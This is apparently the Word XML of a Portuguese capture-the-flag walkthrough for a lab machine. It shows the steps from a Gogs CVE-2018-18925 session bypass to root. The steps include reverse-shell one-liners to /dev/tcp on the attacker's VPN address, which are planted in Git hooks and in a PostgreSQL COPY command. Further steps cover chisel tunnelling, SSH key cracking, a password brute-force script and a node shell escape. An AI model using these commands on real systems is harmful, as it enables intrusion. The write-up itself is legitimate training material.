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99z6mzhwdyo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2jdf36ck1i0p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Like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 Caso precise de suporte, favor abrir um ticket no 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qxin4899h8iy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Iniciamos a enumeração da máquina utilizando o Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A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--min-rate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-sVC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-vvv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62100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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a aplicação pela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identificamos que se trata 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Gogs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um serviço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Git open-source auto-hospedado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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584813"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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48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Realizamos brute force de diretórios e arquivos.</w:t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ffuf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http://&lt;machine-ip&gt;/FUZZ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big.txt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-recursion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41863"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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8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Acessando a rota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/administrator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possível identificar a existência do usuário Administrator.</w:t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60700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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final da página web , observamos também a versão da aplicação e a linguagem utilizada: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1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gogs Version 0.11 – Go 1.11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714500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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verificar a versão da aplicação, identificamos que ela é afetada pela vulnerabilidade </w:t>
      </w:r>
      <w:hyperlink r:id="rId14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CVE-2018-18925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reproduzir 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PoC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é necessário registrar-se na aplicação e, em seguida, realizar o login. Essa vulnerabilidade consiste em um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bypass de sessão por meio da injeção de um arquivo malicioso na aplicação.</w:t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301349"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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134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Registramos um novo usuário na aplicação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82900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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Criamos um novo repositório na aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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71700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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65400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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prosseguir, foi necessário clonar via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Gi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 o repositório criado na aplicação.</w:t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http://&lt;machine-ip&gt;/teste/respository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46300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="115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Também clonamos o repositório público que contém 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PoC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da vulnerabilidade.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A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https://github.com/j4k0m/CVE-2018-18925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24000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="112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Mas, antes de compilarmos o binário, foi necessário definir qual usuário seria alvo do bypass de sessão.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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62100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="114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Compilamos o binário gerado a partir do código em Go.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046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main.go.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749300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="116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Movemos o binário compilado para o diretório do repositório Git clonado anteriormente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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../repository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06400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="117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Configuramos o Git corretamente para permitir adicionar o arquivo malicioso ao repositório e realizar o envio por meio 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git push.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--global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user.name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"teste"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--global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user.email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"teste@teste.com"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"pwn"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38500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="118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arquivo foi adicionado ao repositório criado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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79700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="119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Realizamos o upload do arquivo novamente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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criar uma cópia local do repositório, o Gogs armazena os arquivos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/data/gogs/data/tmp/local-repo/[REPO_ID]/[FILENAME]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diretório que é criado apenas quando a funcionalidade ‘Carregar arquivo’ é utilizada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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76500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="120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619500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="121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seguida, clicamos no botão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Fork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identificar em qual repositório o arquivo enviado estava localizado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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63800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="122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76600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="123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Identificamos que o diretório corresponde ao repositório de número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2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pela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URI.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partir deste ponto, basta alterar o conteúdo do cookie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i_like_gogits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referenciar a sessão falsa criada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070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i_like_gogits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../tmp/local-repo/2/payload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66800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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recarregar a aplicação, obtivemos acesso à conta do administrador.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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324100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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obter acesso à conta de Administrador da aplicação, foi possível executar comandos por meio dos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Git hooks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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594100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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isso, conseguimos acionar nossa reverse-shell por meio da execução de comandos via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Git hooks.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Sobrescrevemos os três Git hooks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— pre-receive, update e post-receive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— com nossa reverse-shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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/bin/bash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/dev/tcp/&lt;ip-vpn&gt;/443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0&gt;&amp;1"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311400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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568700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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que o código seja executado, foi necessário realizar um novo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git push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acionando os hooks modificados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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60600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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Abrimos 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443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obtivemos a reverse-shell com sucesso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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68400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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rrdcxw84uh5o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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090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analisar os arquivos no diretório raiz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(/),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identificamos um arquivo .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dockerenv,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indicando que o ambiente em execução trata-se de um container Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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Por se tratar de um container Docker padrão, não foram identificados arquivos ou informações relevantes para elevação de privilégios. Para tentar escalar privilégios, realizamos a enumeração da infraestrutura visando identificar quais hosts estavam acessíveis na rede local.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096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realizar o scan da rede local, utilizamos um binário estático do </w:t>
      </w:r>
      <w:hyperlink r:id="rId3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Nmap.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Hospedamos o binário em nossa máquina e realizamos a transferência para o ambiente alvo por meio de um servidor local.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&lt;vpn-ip&gt;/nmap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jc w:val="both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79600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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http.server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00300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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o comando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hostname -i,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identificamos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IP atribuído à máquina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e, em seguida, realizamos o scan da rede utilizando a opção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-sn do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Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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./nmap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172.17.0.2/24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60600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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Identificamos dois hosts ativos na rede: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172.17.0.3 e 172.17.0.1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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Executamos o Nmap no host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172.17.0.1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identificamos que as portas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22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estavam abertas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA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./nmap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172.17.0.1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095500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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executar o Nmap no host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172.17.0.3,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identificamos que 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5432 (PostgreSQL)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estava aberta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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98700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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Verificamos se o serviço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PostgreSQL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estava acessível utilizando as credenciais padrão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postgres:postgres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port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forwarding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permite redirecionar o tráfego de uma porta em um sistema para outra porta em outro host, tornando serviços internos acessíveis externamente. Dessa forma, conseguimos acessar o serviço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PostgreSQL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que estava exposto apenas na rede interna.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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a porta está acessível apenas internamente no host, foi necessário criar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port-forwarding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utilizando o </w:t>
      </w:r>
      <w:hyperlink r:id="rId44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Chisel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Transferimos o arquivo para a máquina alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8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&lt;machine-ip&gt;/chisel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032000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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28700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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Estabelecemos a conexão de port forwarding na máquina alvo, permitindo redirecionar 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tráfego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 uma porta remota para uma porta local, viabilizando o acesso ao serviço interno identificado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C0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./chisel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&lt;vpn-ip&gt;:9000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R:5432:172.17.0.3:5432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25500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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./chisel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9000 --reverse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30300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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Dessa forma, conseguimos acessar o serviço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PostgreSQL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interno.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CB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psql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postgres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postgres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localhost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00200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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Se o usuário possuir privilégios elevados como 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postgres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é possível executar comandos diretamente por meio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PostgreSQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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create table shell(output text);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3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'/bin/bash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/dev/tcp/&lt;vpn-ip&gt;/443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0&gt;&amp;1"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533400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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partir deste ponto, conseguimos escalar para o usuário postgres.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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701800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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Utilizamos o comando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find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identificar os binários com SUID presentes na máquina.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DD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-perm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-4000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2&gt;/dev/null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74800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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Identificamos que o binário bash possui o bit SUID habilitado, permitindo sua execução com privilégios de root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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92200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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acesso root, foi possível ler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/mnt/id_rsa.bk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contém uma chave privada de backup.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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765300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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partir deste momento, com acesso root, conseguimos ler em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/mnt/id_rsa.bk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um arquivo de chave privada de backup do usuário.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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03400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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Além disso, ao ler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id_rsa.pub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identificamos a existência do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leonardo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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571500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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a chave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id_rsa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está protegida por senha, foi necessário convertê-la para o formato compatível com o John the Ripper utilizando o utilitário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ssh2john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realizar a quebra da senha.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F3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ssh2john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john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--wordlist=~/rockyou.txt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93900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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seguida, tentamos realizar a autenticação utilizando a chave privada obtida e o usuário previamente identificado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FB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leonardo@&lt;machine-ip&gt;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556238"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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2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Flag do usuário </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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14400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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usuário leonardo possui permissões para executar os binários    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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/usr/bin/bash/usr/bin/safe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como root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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01700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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arquivo safe contém um script em Bash que implementa uma verificação de senha. Ele lê o conteúdo do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/root/senha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solicita ao usuário uma entrada secreta. Caso o valor informado corresponda ao conteúdo do arquivo, o script exibe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/root/segredo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; caso contrário, informa que a senha está incorreta. Para explorar essa funcionalidade, criamos um script específico para automatizar a exploração da vulnerabilidade.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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518138"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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81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o exploit desenvolvido para essa vulnerabilidade no script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safe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obter a senha do usuário root da aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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MhmziuaQnEBWwwRBNhvwrZkQeTwgNlgcITUa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#!/bin/bash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possible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characters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chars=({a..z}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{A..Z}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{0..9}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'!'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'"'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'#'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'$'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'&amp;'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"'"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'('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')'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'*'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'+'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','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'-'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'.'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'/'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':'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';'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'&lt;'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'='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'&gt;'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'?'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'@'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'['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']'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'^'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'_'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'`'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'|'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'}'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'~')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prefix=""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max_length=50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Maximum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prevent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infinite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${#prefix}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$max_length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found=false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"[*]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prefix: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'$prefix'"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2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prefix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(without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wildcard)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result=$(echo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"$prefix"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/usr/bin/bash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/usr/bin/safe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2&gt;&amp;1)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"$result"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-q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"Password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matched!";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sdt>
        <w:sdtPr>
          <w:id w:val="-754227086"/>
          <w:tag w:val="goog_rdk_0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sz w:val="18"/>
              <w:szCs w:val="18"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">"[√]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt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$prefix"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"$result"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2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"${chars[@]}";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attempt="${prefix}${c}*"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prevent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hanging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result=$(echo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"$attempt"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/usr/bin/bash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/usr/bin/safe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2&gt;&amp;1)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13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"$result"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-q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"Password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matched!";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prefix+="$c"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"[-]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$prefix"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3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"$found"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"[-]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characters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$prefix"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result=$(echo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"$prefix"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/usr/bin/bash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/usr/bin/safe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2&gt;&amp;1)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"$result"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${#prefix}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$max_length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"[!]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Reached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maximum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($max_length).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Stopping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prevent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infinite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loop."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959100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="104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05000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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 senha do usuário, foi possível executar o comando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/usr/bin/nod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 com privilégios elevados, permitindo a obtenção de acesso como root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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77900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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seguida, foi executado o comando necessário para obter acesso ao usuário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root.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/usr/bin/node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'require("child_process").spawn("/bin/sh",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{stdio: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2]})'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70000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="110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Conseguimos obter a flag de root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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400675" cy="1104900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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104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left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId67" w:type="default"/>
      <w:headerReference r:id="rId68" w:type="first"/>
      <w:headerReference r:id="rId69" w:type="even"/>
      <w:footerReference r:id="rId70" w:type="default"/>
      <w:footerReference r:id="rId71" w:type="first"/>
      <w:footerReference r:id="rId72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  <w:font w:name="IBM Plex Sans SemiBold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F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9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A">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.9ayk3x7hdiy4" w:id="4"/>
    <w:bookmarkEnd w:id="4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-866771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87" name="image22.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image22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5B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C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26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D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-942971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95" name="image34.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image34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6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Like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66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7025" cy="300615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6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5.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId45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8.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId4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pp.hackingclub.com/laboratory/competition-machines/290#" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId15" 